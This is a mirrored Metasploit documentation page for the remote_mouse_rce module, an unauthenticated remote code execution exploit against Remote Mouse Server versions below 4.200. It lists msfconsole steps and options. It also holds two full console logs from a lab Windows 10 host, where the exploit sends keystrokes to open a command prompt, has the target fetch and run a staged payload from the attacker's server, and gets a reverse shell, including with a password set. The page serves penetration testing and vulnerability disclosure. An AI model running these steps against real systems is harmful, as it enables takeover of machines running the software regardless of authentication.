CoCalc -- remote_mouse

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/misc/remote_mouse_rce.md
Views: ¹¹⁷⁸⁸

Vulnerable Application

This module utilizes the Remote Mouse Server by Emote Interactive protocol to deploy a payload and run it from the server on versions < 4.200 (500 server response). This module will deploy a payload regardless if server authentication is required. Tested against 4.110, current at the time of module writing

Version 4.110 can be downloaded from (unofficial site)[https://remote-mouse.en.uptodown.com/windows/download/4546712]

Verification Steps

Install the application
Start msfconsole
Do: use exploit/windows/misc/remote_mouse_rce
Set rhost and lhost as required.
Do: run
You should get a shell as the user who is running Remote Mouse.

Options

SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen. Defaults to 1.

PATH

The path where the payload should be downloaded/staged to. Defaults to c:\\Windows\\Temp\\.

Scenarios

Remote Mouse 4.110 on Windows 10

resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > run

[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49962) at 2022-09-27 16:33:02 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>whoami 
whoami
win10prolicense\windows

C:\Users\windows>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299

Remote Mouse 4.110 on Windows 10, with a password

resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > exploit

[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49975) at 2022-09-27 16:36:09 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\86a4GsbpomvEgUS.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Vulnerable Application

Verification Steps

Options

SLEEP

PATH

Scenarios

Remote Mouse 4.110 on Windows 10

Remote Mouse 4.110 on Windows 10, with a password

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Vulnerable Application

Verification Steps

Options

SLEEP

PATH

Scenarios

Remote Mouse 4.110 on Windows 10

Remote Mouse 4.110 on Windows 10, with a password

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.